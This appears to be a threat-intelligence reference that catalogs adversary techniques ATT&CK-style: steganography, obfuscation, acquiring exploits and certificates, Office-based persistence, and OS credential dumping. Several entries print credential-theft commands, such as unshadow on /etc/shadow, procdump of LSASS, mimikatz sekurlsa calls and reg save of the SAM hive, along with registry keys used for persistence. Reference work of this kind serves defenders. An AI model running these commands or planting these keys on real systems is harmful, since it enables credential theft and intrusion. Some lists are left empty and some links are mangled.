Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

[Duqu](https://app.tidalcyber.com/software/d4a664e5-9819-4f33-8b2b-e6f8e6a64999) was an early example of malware that used steganography. It encrypted the gathered information from a victim’s system and hid it within an image before exfiltrating the image to a C2 server.<sup>[[Wikipedia Duqu](https://app.tidalcyber.com/references/5cf0101e-c036-4c1c-b322-48f04e2aef0b)]</sup>

By the end of 2017, a threat group used <code>Invoke-PSImage</code> to hide [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands in an image file (.png) and execute the code on a victim’s system. In this particular case the [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) code downloaded another obfuscated script to gather intelligence from the victim’s machine and communicate it back to the adversary.<sup>[[McAfee Malicious Doc Targets Pyeongchang Olympics](https://app.tidalcyber.com/references/e6b5c261-86c1-4b6b-8a5e-c6a454554588)]</sup>

The tag is: misp-galaxy:technique="Steganography"

Stripped Payloads

Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s linker when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.<sup>[[Mandiant golang stripped binaries explanation](https://app.tidalcyber.com/references/60eb0109-9655-41ab-bf76-37b17bf9594a)]</sup><sup>[[intezer stripped binaries elf files 2018](https://app.tidalcyber.com/references/2d1faa93-fed5-4b0d-b6c9-72bbc4782201)]</sup>

Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.<sup>[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]</sup>

The tag is: misp-galaxy:technique="Stripped Payloads"

Obfuscated Files or Information

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user’s action may be required to open and [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup> Adversaries may also use compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. <sup>[[Linux/Cdorked.A We Live Security Analysis](https://app.tidalcyber.com/references/f76fce2e-2884-4b50-a7d7-55f08b84099c)]</sup> Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. <sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>

Adversaries may also abuse [Command Obfuscation](https://app.tidalcyber.com/technique/d8406198-626c-5659-945e-2b5105fcd0c9) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. <sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup> <sup>[[FireEye Revoke-Obfuscation July 2017](https://app.tidalcyber.com/references/e03e9d19-18bb-4d28-8c96-8c1cef89a20b)]</sup><sup>[[PaloAlto EncodedCommand March 2017](https://app.tidalcyber.com/references/069ef9af-3402-4b13-8c60-b397b0b0bfd7)]</sup>

The tag is: misp-galaxy:technique="Obfuscated Files or Information"

Code Signing Certificates

Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.<sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.

The tag is: misp-galaxy:technique="Code Signing Certificates"

Digital Certificates - Duplicate2

Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.

Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.<sup>[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]</sup> Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.

Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.<sup>[[Let’s Encrypt FAQ](https://app.tidalcyber.com/references/96e1ccb9-bd5c-4716-8848-4c30e6eac4ad)]</sup>

After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.

The tag is: misp-galaxy:technique="Digital Certificates - Duplicate2"

Exploits

Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.<sup>[[Exploit Database](https://app.tidalcyber.com/references/38f7b3ea-9959-4dfb-8216-a745d071e7e2)]</sup><sup>[[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)]</sup><sup>[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]</sup>

In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.<sup>[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]</sup><sup>[[Wired SandCat Oct 2019](https://app.tidalcyber.com/references/5f28adee-1313-48ec-895c-27341bd1071f)]</sup> In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).<sup>[[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)]</sup>

An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).

The tag is: misp-galaxy:technique="Exploits"

Malware

Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).

The tag is: misp-galaxy:technique="Malware"

Tool

Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.<sup>[[Recorded Future Beacon 2019](https://app.tidalcyber.com/references/4e554042-53bb-44d4-9acc-44c86329ac47)]</sup>

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).

The tag is: misp-galaxy:technique="Tool"

Vulnerabilities

Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.<sup>[[National Vulnerability Database](https://app.tidalcyber.com/references/9b42dcc6-a39c-4d74-adc3-135f9ceac5ba)]</sup>

An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://app.tidalcyber.com/technique/8842e2e3-c4f8-446b-821b-5930cb15d30c)) or to attempt to develop one themselves (i.e. [Exploits](https://app.tidalcyber.com/technique/5a57d258-0b23-431b-b50e-3150d2c0e52c)).

The tag is: misp-galaxy:technique="Vulnerabilities"

Obtain Capabilities

Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.

In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.<sup>[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]</sup><sup>[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]</sup>

In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.<sup>[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]</sup>

The tag is: misp-galaxy:technique="Obtain Capabilities"

Add-ins

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. <sup>[[Microsoft Office Add-ins](https://app.tidalcyber.com/references/99b20e30-76a8-4108-84ae-daf92058b44b)]</sup> There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. <sup>[[MRWLabs Office Persistence Add-ins](https://app.tidalcyber.com/references/a5b6ab63-0e6f-4789-a017-ceab1719ed85)]</sup><sup>[[FireEye Mail CDS 2018](https://app.tidalcyber.com/references/0af1795c-9cdd-43fa-8184-73f33d9f5366)]</sup>

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.

The tag is: misp-galaxy:technique="Add-ins"

Office Template Macros

Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. <sup>[[Microsoft Change Normal Template](https://app.tidalcyber.com/references/76bf3ce1-b94c-4b3d-9707-aca8a1ae5555)]</sup>

Office Visual Basic for Applications (VBA) macros <sup>[[MSDN VBA in Office](https://app.tidalcyber.com/references/9c44416d-1f3d-4d99-b497-4615ed6f5546)]</sup> can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.<sup>[[enigma0x3 normal.dotm](https://app.tidalcyber.com/references/b8339d48-699d-4043-8197-1f0435a8dca5)]</sup><sup>[[Hexacorn Office Template Macros](https://app.tidalcyber.com/references/7d558a35-a5c0-4e4c-92bf-cb2435c41a95)]</sup> Shared templates may also be stored and pulled from remote locations.<sup>[[GlobalDotName Jun 2019](https://app.tidalcyber.com/references/f574182a-5d91-43c8-b560-e84a7e941c96)]</sup>

Word Normal.dotm location:<br> <code>C:\Users&lt;username>\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>

Excel Personal.xlsb location:<br> <code>C:\Users&lt;username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>

Adversaries may also change the location of the base template to point to their own by hijacking the application’s search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.<sup>[[GlobalDotName Jun 2019](https://app.tidalcyber.com/references/f574182a-5d91-43c8-b560-e84a7e941c96)]</sup>

An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.

The tag is: misp-galaxy:technique="Office Template Macros"

Office Test

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.<sup>[[Hexacorn Office Test](https://app.tidalcyber.com/references/60d90852-ea00-404d-b613-9ad1589aff31)]</sup><sup>[[Palo Alto Office Test Sofacy](https://app.tidalcyber.com/references/3138f32c-f89c-439c-a8c5-2964c356308d)]</sup>

There exist user and global Registry keys for the Office Test feature:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.

The tag is: misp-galaxy:technique="Office Test"

Outlook Forms

Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.<sup>[[SensePost Outlook Forms](https://app.tidalcyber.com/references/5d91a713-2f05-43bd-9fef-aa3f51f4c45a)]</sup>

Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.<sup>[[SensePost Outlook Forms](https://app.tidalcyber.com/references/5d91a713-2f05-43bd-9fef-aa3f51f4c45a)]</sup>

The tag is: misp-galaxy:technique="Outlook Forms"

Outlook Home Page

Adversaries may abuse Microsoft Outlook’s Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.<sup>[[SensePost Outlook Home Page](https://app.tidalcyber.com/references/d2758a4b-d326-45a7-9ebf-03efcd1832da)]</sup>

Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.<sup>[[SensePost Outlook Home Page](https://app.tidalcyber.com/references/d2758a4b-d326-45a7-9ebf-03efcd1832da)]</sup>

The tag is: misp-galaxy:technique="Outlook Home Page"

Outlook Rules

Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.<sup>[[SilentBreak Outlook Rules](https://app.tidalcyber.com/references/a2ad0658-7c12-4f58-b7bf-6300eacb4a8f)]</sup>

Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.<sup>[[SilentBreak Outlook Rules](https://app.tidalcyber.com/references/a2ad0658-7c12-4f58-b7bf-6300eacb4a8f)]</sup>

The tag is: misp-galaxy:technique="Outlook Rules"

Office Application Startup

Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.

A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.<sup>[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)]</sup> These persistence mechanisms can work within Outlook or be used through Office 365.<sup>[[TechNet O365 Outlook Rules](https://app.tidalcyber.com/references/c7f9bd2f-254a-4254-8a92-a3ab02455fcb)]</sup>

The tag is: misp-galaxy:technique="Office Application Startup"

Cached Domain Credentials

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.<sup>[[Microsoft - Cached Creds](https://app.tidalcyber.com/references/590ea63f-f800-47e4-8d39-df11a184ba84)]</sup>

On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.<sup>[[PassLib mscache](https://app.tidalcyber.com/references/ce40e997-d04b-49a6-8838-13205c54243a)]</sup> The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) to recover the plaintext password.<sup>[[ired mscache](https://app.tidalcyber.com/references/5b643e7d-1ace-4517-88c2-96115cac1209)]</sup>

With SYSTEM access, the tools/utilities such as [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16), [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532), and secretsdump.py can be used to extract the cached credentials.

Note: Cached credentials for Windows Vista are derived using PBKDF2.<sup>[[PassLib mscache](https://app.tidalcyber.com/references/ce40e997-d04b-49a6-8838-13205c54243a)]</sup>

The tag is: misp-galaxy:technique="Cached Domain Credentials"

DCSync

Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller’s application programming interface (API)<sup>[[Microsoft DRSR Dec 2017](https://app.tidalcyber.com/references/43b75a27-7875-4c24-b04d-54e1b60f3028)]</sup> <sup>[[Microsoft GetNCCChanges](https://app.tidalcyber.com/references/410570e4-b578-4838-a25d-f03d92fcf3cb)]</sup> <sup>[[Samba DRSUAPI](https://app.tidalcyber.com/references/79e8f598-9962-4124-b884-eb10f86885af)]</sup> <sup>[[Wine API samlib.dll](https://app.tidalcyber.com/references/d0fdc669-959c-42ed-be5d-386a4e90a897)]</sup> to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data<sup>[[ADSecurity Mimikatz DCSync](https://app.tidalcyber.com/references/61b0bb42-2ed6-413d-b331-0a84df12a87d)]</sup> from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) for use in [Pass the Ticket]([Harmj0y Mimikatz and DCSync(https://app.tidalcyber.com/references/2afa76c1-caa1-4f16-9289-7abc7eb3a102)]</sup> or change an account’s password as noted in [Account Manipulation]([InsiderThreat ChangeNTLM July 2017(https://app.tidalcyber.com/references/3bf24c68-fc98-4143-9dff-f54030c902fe)]</sup>

DCSync functionality has been included in the "lsadump" module in [Mimikatz]([GitHub Mimikatz lsadump Module(https://app.tidalcyber.com/references/e188ff4d-a983-4f5a-b9e1-3b0f9fd8df25)]</sup> Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.<sup>[[Microsoft NRPC Dec 2017](https://app.tidalcyber.com/references/05cf36a3-ff04-4437-9209-376e9f27c009)]</sup>

The tag is: misp-galaxy:technique="DCSync"

/etc/passwd and /etc/shadow

Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.<sup>[[Linux Password and Shadow File Formats](https://app.tidalcyber.com/references/7c574609-4b0d-44e7-adc3-8a3d67e10e9f)]</sup>

The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:<sup>[[nixCraft - John the Ripper](https://app.tidalcyber.com/references/5e093b21-8bbd-4ad4-9fe2-cbb04207f1d3)]</sup> <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>

The tag is: misp-galaxy:technique="/etc/passwd and /etc/shadow"

LSA Secrets

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.<sup>[[Passcape LSA Secrets](https://app.tidalcyber.com/references/64b0e13f-de5f-4964-bcfa-bb0f6206383a)]</sup><sup>[[Microsoft AD Admin Tier Model](https://app.tidalcyber.com/references/3afba81a-3b1d-41ec-938e-24f055698d52)]</sup><sup>[[Tilbury Windows Credentials](https://app.tidalcyber.com/references/2ddae0c9-910c-4c1a-b524-de3a58dbba13)]</sup> LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.<sup>[[ired Dumping LSA Secrets](https://app.tidalcyber.com/references/cf883397-11e9-4f94-977a-bbe46e3107f5)]</sup>

[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) can be used to extract from the Registry. [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16) can be used to extract secrets from memory.<sup>[[ired Dumping LSA Secrets](https://app.tidalcyber.com/references/cf883397-11e9-4f94-977a-bbe46e3107f5)]</sup>

The tag is: misp-galaxy:technique="LSA Secrets"

LSASS Memory

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) using [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

  • <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

  • <code>sekurlsa::Minidump lsassdump.dmp</code>

  • <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.<sup>[[Graeber 2014](https://app.tidalcyber.com/references/f2f9a6bf-b4d9-461e-b961-0610ea72faf0)]</sup>

The following SSPs can be used to access credentials:

The tag is: misp-galaxy:technique="LSASS Memory"

NTDS

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.<sup>[[Wikipedia Active Directory](https://app.tidalcyber.com/references/924e1186-57e5-43db-94ab-29afa3fdaa7b)]</sup>

In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.<sup>[[Metcalf 2015](https://app.tidalcyber.com/references/1c899028-466c-49b0-8d64-1a954c812508)]</sup>

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.

  • Volume Shadow Copy

  • secretsdump.py

  • Using the in-built Windows tool, ntdsutil.exe

  • Invoke-NinjaCopy

The tag is: misp-galaxy:technique="NTDS"

Proc Filesystem

Adversaries may gather credentials from the proc filesystem or /proc. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the /proc/<PID>/maps file shows how memory is mapped within the process’s virtual address space. And /proc/<PID>/mem, exposed for debugging purposes, provides access to the process’s virtual address space.<sup>[[Picus Labs Proc cump 2022](https://app.tidalcyber.com/references/e8a50a79-6ca4-5c91-87ad-0b1ba9eca505)]</sup><sup>[[baeldung Linux proc map 2022](https://app.tidalcyber.com/references/b70d04e4-c5f9-5cb2-b896-9bd64e97369e)]</sup>

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.<sup>[[MimiPenguin GitHub May 2017](https://app.tidalcyber.com/references/b10cd6cc-35ed-4eac-b213-110de28f33ef)]</sup><sup>[[Polop Linux PrivEsc Gitbook](https://app.tidalcyber.com/references/a73a2819-61bd-5bd2-862d-5eeed344909f)]</sup>

If running as or with the permissions of a web browser, a process can search the /maps & /mem locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.

The tag is: misp-galaxy:technique="Proc Filesystem"

Security Account Manager

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

Alternatively, the SAM can be extracted from the Registry with Reg:

  • <code>reg save HKLM\sam sam</code>

  • <code>reg save HKLM\system system</code>

Creddump7 can then be used to process the SAM database locally to retrieve hashes.<sup>[[GitHub Creddump7](https://app.tidalcyber.com/references/276975da-7b5f-49aa-975e-4ac9bc527cf2)]</sup>

Notes:

  • RID 500 account is the local, built-in administrator.

  • RID 501 is the guest account.

  • User accounts start with a RID of 1,000+.

The tag is: misp-galaxy:technique="Security Account Manager"

OS Credential Dumping

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

The tag is: misp-galaxy:technique="OS Credential Dumping"

Password Policy Discovery

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).

